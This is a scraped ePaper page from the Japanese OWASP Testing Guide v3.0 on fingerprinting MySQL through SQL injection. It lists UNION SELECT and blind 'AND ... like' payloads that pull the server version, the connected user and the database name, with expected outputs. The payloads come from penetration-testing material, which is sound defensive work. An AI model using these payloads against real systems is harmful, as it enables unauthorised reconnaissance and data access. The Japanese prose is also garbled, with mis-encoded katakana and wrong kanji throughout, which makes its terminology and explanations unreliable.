11.05.2014 Views

OWASP テスティングガイド

OWASP テスティングガイド

OWASP テスティングガイド

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

<strong>OWASP</strong> Testing Guide v3.0<br />

if(version >= 4.1.10)<br />

キウヨに'and 1=0'を 追 加 する<br />

結 果 が 同 じであるように、これらは 同 等 です。<br />

イヱバヱドのイヱザェキサュヱ8<br />

1 AND 1=0 UNION SELECT @@version /*<br />

推 測 のイヱザェキサュヱ8<br />

1 AND @@version like '4.0%'<br />

予 期 する 結 果 :<br />

このような 文 字 :5.0.22-log<br />

ロギアンヱヤーザ<br />

MySQL コーバには 2 種 類 のヤーゴがあります。<br />

1. [USER()]:MySQL コーバに 接 続 しているヤーゴ<br />

2. [CURRENT_USER()]:キウヨを 実 行 している 内 部邪 のヤーゴ<br />

1 と 2 には 少 し 遊 いがあります。<br />

主 な 遊 いの 1 つは、( 許 可 されていれば' 匿 名 ヤーゴが 適遚 当 な 名 前 を 使 って 接 続 できます。しかし、MySQL の 内 部邪 ヤーゴ<br />

は 空 の 名 前 ('''です。<br />

他 の 遊 いは、シトアドプルサーザメやシトアド 関 数 は、どこかで 宣 言 がされていなければ、 作 成 したヤーゴで 実 行 されます。<br />

これは、CURRENT_USER を 使 用 することで 知 ることができます。<br />

イヱバヱドのイヱザェキサュヱ8<br />

1 AND 1=0 UNION SELECT USER()<br />

推 測 のイヱザェキサュヱ8<br />

1 AND USER() like 'root%'<br />

予 期 する 結 果 :<br />

このような 文 字 :user@hostname<br />

使 用 しているデータベースの 名 前<br />

ネイティブの 関 数 DATABASE()があります。<br />

イヱバヱドのイヱザェキサュヱ8<br />

1 AND 1=0 UNION SELECT DATABASE()<br />

推 測 のイヱザェキサュヱ8<br />

1 AND DATABASE() like 'db%'<br />

233

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!